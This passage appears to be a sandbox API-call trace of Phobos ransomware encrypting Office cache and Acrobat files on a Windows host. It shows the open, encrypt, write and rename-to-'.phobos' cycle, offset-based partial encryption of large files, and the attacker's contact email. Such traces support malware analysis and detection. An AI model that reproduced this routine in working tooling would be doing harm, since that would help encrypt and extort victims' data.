dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0163.546] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=174440) returned 1 [0163.546] CloseHandle (hObject=0x130) returned 1 [0163.546] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020 [0163.546] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0163.546] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0163.546] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0163.546] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0163.546] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0163.547] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0163.547] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0163.547] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2a968, lpOverlapped=0x0) returned 1 [0163.779] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2a970, dwBufLen=0x2a970 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2a970) returned 1 [0163.781] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2a970, lpOverlapped=0x0) returned 1 [0163.784] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ce8) returned 1 [0163.784] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0163.784] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0163.784] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0163.784] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0163.784] CryptDestroyKey (hKey=0xa32da8) returned 1 [0163.784] CloseHandle (hObject=0x130) returned 1 [0163.784] CloseHandle (hObject=0x14c) returned 1 [0163.784] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1 [0163.786] SetEvent (hEvent=0xe8) returned 1 [0163.786] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0163.786] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0163.789] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=7378792) returned 1 [0163.789] CloseHandle (hObject=0x14c) returned 1 [0163.789] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020 [0163.789] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0163.790] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0163.790] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0163.790] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0163.790] ReadFile (in: hFile=0x14c, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0163.815] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0163.816] ReadFile (in: hFile=0x14c, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0163.851] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0163.851] ReadFile (in: hFile=0x14c, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0163.877] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32da8) returned 1 [0163.878] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0163.878] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050) returned 1 [0163.883] CryptDestroyKey (hKey=0xa32da8) returned 1 [0163.883] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0163.883] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0102, lpOverlapped=0x0) returned 1 [0163.898] SetEndOfFile (hFile=0x14c) returned 1 [0163.898] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0163.898] WriteFile (in: hFile=0x14c, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0163.903] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0163.903] WriteFile (in: hFile=0x14c, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0163.905] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0163.905] WriteFile (in: hFile=0x14c, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0163.906] CloseHandle (hObject=0x14c) returned 1 [0163.906] SetEvent (hEvent=0xe8) returned 1 [0163.906] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0163.907] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0163.907] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=36233052) returned 1 [0163.907] CloseHandle (hObject=0x14c) returned 1 [0163.907] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020 [0163.907] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0163.908] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0163.908] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0163.908] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0163.908] ReadFile (in: hFile=0x14c, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0163.972] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0163.972] ReadFile (in: hFile=0x14c, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0164.234] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0164.234] ReadFile (in: hFile=0x14c, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0164.771] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32ca8) returned 1 [0164.771] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0164.771] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060) returned 1 [0164.777] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0164.777] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0164.777] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0112, lpOverlapped=0x0) returned 1 [0164.791] SetEndOfFile (hFile=0x14c) returned 1 [0164.792] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0164.792] WriteFile (in: hFile=0x14c, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0164.793] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0164.793] WriteFile (in: hFile=0x14c, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0164.794] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0164.794] WriteFile (in: hFile=0x14c, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0164.795] CloseHandle (hObject=0x14c) returned 1 [0164.795] SetEvent (hEvent=0xe8) returned 1 [0164.795] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0164.795] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0164.795] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=12060672) returned 1 [0164.795] CloseHandle (hObject=0x14c) returned 1 [0164.795] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi")) returned 0x2020 [0164.796] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0164.796] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0164.796] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0164.796] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0164.796] ReadFile (in: hFile=0x14c, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0164.889] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x3d5800, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0164.889] ReadFile (in: hFile=0x14c, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0165.007] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xb40800, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0165.007] ReadFile (in: hFile=0x14c, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0165.073] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32c68) returned 1 [0165.073] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.073] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060) returned 1 [0165.081] CryptDestroyKey (hKey=0xa32c68) returned 1 [0165.081] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0165.081] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0112, lpOverlapped=0x0) returned 1 [0165.099] SetEndOfFile (hFile=0x14c) returned 1 [0165.099] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xb40800, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0165.099] WriteFile (in: hFile=0x14c, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0165.102] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x3d5800, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0165.102] WriteFile (in: hFile=0x14c, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0165.162] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0165.163] WriteFile (in: hFile=0x14c, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0165.166] CloseHandle (hObject=0x14c) returned 1 [0165.167] SetEvent (hEvent=0xe8) returned 1 [0165.167] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.167] CreateFileW (lpFileName="\\\\?\\C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.167] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.167] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0165.167] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=479) returned 1 [0165.167] CloseHandle (hObject=0x14c) returned 1 [0165.168] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata")) returned 0x2020 [0165.168] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.168] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0165.168] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.168] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.168] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0165.168] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0165.168] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.168] ReadFile (in: hFile=0x14c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1df, lpOverlapped=0x0) returned 1 [0165.169] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x3070020*, 